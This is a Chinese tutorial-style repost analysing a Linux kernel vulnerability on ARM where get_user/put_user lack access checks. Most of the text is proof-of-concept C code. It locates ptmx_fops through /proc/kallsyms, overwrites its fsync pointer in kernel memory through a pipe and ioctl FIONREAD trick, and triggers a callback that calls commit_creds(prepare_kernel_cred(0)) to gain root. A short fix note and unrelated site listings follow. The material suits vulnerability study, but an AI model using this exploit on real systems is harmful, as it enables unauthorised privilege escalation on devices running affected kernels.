Missing access checks in put

php中文网

发布时间：2016-06-07 15:43:58

1270人浏览过

来源于php中文网

原创

/* 作者：莫灰灰邮箱： minzhenfei@163.com */ 1.漏洞成因 Linux kernel对ARM上的get_user/put_user缺少访问权限检查，本地攻击者可利用此漏洞读写内核内存，获取权限提升。 2.受影响的系统 Linux kernel 3.2.2 Linux kernel 3.2.13 Linux kernel 3.2.1 3.P

作者：莫灰灰邮箱： minzhenfei@163.com

1.漏洞成因

Linux kernel对ARM上的get_user/put_user缺少访问权限检查，本地攻击者可利用此漏洞读写内核内存，获取权限提升。

v0.dev

Vercel推出的AI生成式UI工具，通过文本描述生成UI组件代码

下载

2.受影响的系统

Linux kernel 3.2.2
Linux kernel 3.2.13
Linux kernel 3.2.1

3.PoC分析

（1）从/proc/kallsyms文件中获得数据结构ptmx_fops的地址

void *ptmx_fops = kallsyms_get_symbol_address("ptmx_fops");
unsigned int ptmx_fops_fsync_address = (unsigned int)ptmx_fops + 0x38;

static void *kallsyms_get_symbol_address(const char *symbol_name)
{
	FILE *fp;
	char function[BUFSIZ];
	char symbol;
	void *address;
	int ret;

	fp = fopen("/proc/kallsyms", "r");
	if (!fp) {
		printf("Failed to open /proc/kallsyms due to %s.", strerror(errno));
		return 0;
	}

	while(!feof(fp)) {
		ret = fscanf(fp, "%p %c %s", &address, &symbol, function);
		if (ret != 3) {
			break;
		}

		if (!strcmp(function, symbol_name)) {
			fclose(fp);
			return address;
		}
	}
	fclose(fp);

	return NULL;
}

（2）找到fsync的地址，即ptmx_fops+0x38的地方

static struct file_operations ptmx_fops;

struct file_operations {
	struct module *owner;
	loff_t (*llseek) (struct file *, loff_t, int);
	ssize_t (*read) (struct file *, char __user *, size_t, loff_t *);
	ssize_t (*write) (struct file *, const char __user *, size_t, loff_t *);
	ssize_t (*aio_read) (struct kiocb *, const struct iovec *, unsigned long, loff_t);
	ssize_t (*aio_write) (struct kiocb *, const struct iovec *, unsigned long, loff_t);
	int (*iterate) (struct file *, struct dir_context *);
	unsigned int (*poll) (struct file *, struct poll_table_struct *);
	long (*unlocked_ioctl) (struct file *, unsigned int, unsigned long);
	long (*compat_ioctl) (struct file *, unsigned int, unsigned long);
	int (*mmap) (struct file *, struct vm_area_struct *);
	int (*open) (struct inode *, struct file *);
	int (*flush) (struct file *, fl_owner_t id);
	int (*release) (struct inode *, struct file *);
	int (*fsync) (struct file *, loff_t, loff_t, int datasync);
	int (*aio_fsync) (struct kiocb *, int datasync);
	<span style="color:#ff0000;"><strong>int (*fasync) (int, struct file *, int);</strong></span>
	int (*lock) (struct file *, int, struct file_lock *);
	ssize_t (*sendpage) (struct file *, struct page *, int, size_t, loff_t *, int);
	unsigned long (*get_unmapped_area)(struct file *, unsigned long, unsigned long, unsigned long, unsigned long);
	int (*check_flags)(int);
	int (*flock) (struct file *, int, struct file_lock *);
	ssize_t (*splice_write)(struct pipe_inode_info *, struct file *, loff_t *, size_t, unsigned int);
	ssize_t (*splice_read)(struct file *, loff_t *, struct pipe_inode_info *, size_t, unsigned int);
	int (*setlease)(struct file *, long, struct file_lock **);
	long (*fallocate)(struct file *file, int mode, loff_t offset,
			  loff_t len);
	int (*show_fdinfo)(struct seq_file *m, struct file *f);
};

（3）替换fsync函数指针为自己的函数

if(pipe_write_value_at_address( ptmx_fops_fsync_address,(unsigned int)&ptmx_fsync_callback )){

ptmx_fsync_callback函数可以使本进程得到权限提升

/* 	obtain_root_privilege - userland callback function
We set ptmx_fops.fsync to the address of this function
Calling fysnc on the open /dev/ptmx file descriptor will result
in this function being called in the kernel context
We can the call the prepare/commit creds combo to escalate the
processes priveledge.	
*/
static void ptmx_fsync_callback(void)
{
	commit_creds(prepare_kernel_cred(0));
}

pipe_write_value_at_address函数底层通过put_user函数改写内核地址内容

static unsigned int pipe_write_value_at_address(unsigned long address, unsigned int value)
{
	char data[4];
	int pipefd[2];
	int i;

	*(long *)&data = value;

	if (pipe(pipefd) == -1) {
		perror("pipe");
		return 1;
	}

	for (i = 0; i < (int) sizeof(data) ; i++) {
		char buf[256];
		buf[0] = 0;
		if (data[i]) {
			if (write(pipefd[1], buf, data[i]) != data[i]) {
				printf("error in write().\n");
				break;
			}
		}

		if (ioctl(pipefd[0], FIONREAD, (void *)(address + i)) == -1) {
			perror("ioctl");
			break;
		}

		if (data[i]) {
			if (read(pipefd[0], buf, sizeof buf) != data[i]) {
				printf("error in read().\n");
				break;
			}
		}
	}

	close(pipefd[0]);
	close(pipefd[1]);

	return (i == sizeof (data));
}

（4）手动调用fsync函数，触发自己的hook函数，得到权限提升

int fd = open(PTMX_DEVICE, O_WRONLY);
if(!fd) return 1; 
fsync(fd);
close(fd);

4.修复

在put_user之前加了个地址判断

Missing access checks in put

mysql错误信息

mysql 错误提示

mysql 1045错误：原因和解决方法

mysql中odbc是什么

RBAC权限控制实现原理——权限表、用户表与关联表设计

相关专题

pixiv网页版官网登录与阅读指南_pixiv官网直达入口与在线访问方法

本专题系统整理pixiv网页版官网入口及登录访问方式，涵盖官网登录页面直达路径、在线阅读入口及快速进入方法说明，帮助用户高效找到pixiv官方网站，实现便捷、安全的网页端浏览与账号登录体验。

463

2026.02.13

微博网页版主页入口与登录指南_官方网页端快速访问方法

本专题系统整理微博网页版官方入口及网页端登录方式，涵盖首页直达地址、账号登录流程与常见访问问题说明，帮助用户快速找到微博官网主页，实现便捷、安全的网页端登录与内容浏览体验。

135

2026.02.13

Flutter跨平台开发与状态管理实战

本专题围绕Flutter框架展开，系统讲解跨平台UI构建原理与状态管理方案。内容涵盖Widget生命周期、路由管理、Provider与Bloc状态管理模式、网络请求封装及性能优化技巧。通过实战项目演示，帮助开发者构建流畅、可维护的跨平台移动应用。

2026.02.13

TypeScript工程化开发与Vite构建优化实践

本专题面向前端开发者，深入讲解 TypeScript 类型系统与大型项目结构设计方法，并结合 Vite 构建工具优化前端工程化流程。内容包括模块化设计、类型声明管理、代码分割、热更新原理以及构建性能调优。通过完整项目示例，帮助开发者提升代码可维护性与开发效率。

2026.02.13

Redis高可用架构与分布式缓存实战

本专题围绕 Redis 在高并发系统中的应用展开，系统讲解主从复制、哨兵机制、Cluster 集群模式及数据分片原理。内容涵盖缓存穿透与雪崩解决方案、分布式锁实现、热点数据优化及持久化策略。通过真实业务场景演示，帮助开发者构建高可用、可扩展的分布式缓存系统。

2026.02.13

c语言数据类型

本专题整合了c语言数据类型相关内容，阅读专题下面的文章了解更多详细内容。

2026.02.12

雨课堂网页版登录入口与使用指南_官方在线教学平台访问方法

本专题系统整理雨课堂网页版官方入口及在线登录方式，涵盖账号登录流程、官方直连入口及平台访问方法说明，帮助师生用户快速进入雨课堂在线教学平台，实现便捷、高效的课程学习与教学管理体验。

2026.02.12

豆包AI网页版入口与智能创作指南_官方在线写作与图片生成使用方法

本专题汇总豆包AI官方网页版入口及在线使用方式，涵盖智能写作工具、图片生成体验入口和官网登录方法，帮助用户快速直达豆包AI平台，高效完成文本创作与AI生图任务，实现便捷智能创作体验。

524

2026.02.12

PostgreSQL性能优化与索引调优实战

本专题面向后端开发与数据库工程师，深入讲解 PostgreSQL 查询优化原理与索引机制。内容包括执行计划分析、常见索引类型对比、慢查询优化策略、事务隔离级别以及高并发场景下的性能调优技巧。通过实战案例解析，帮助开发者提升数据库响应速度与系统稳定性。

2026.02.12

热门下载

网站特效

网站源码

网站素材

前端模板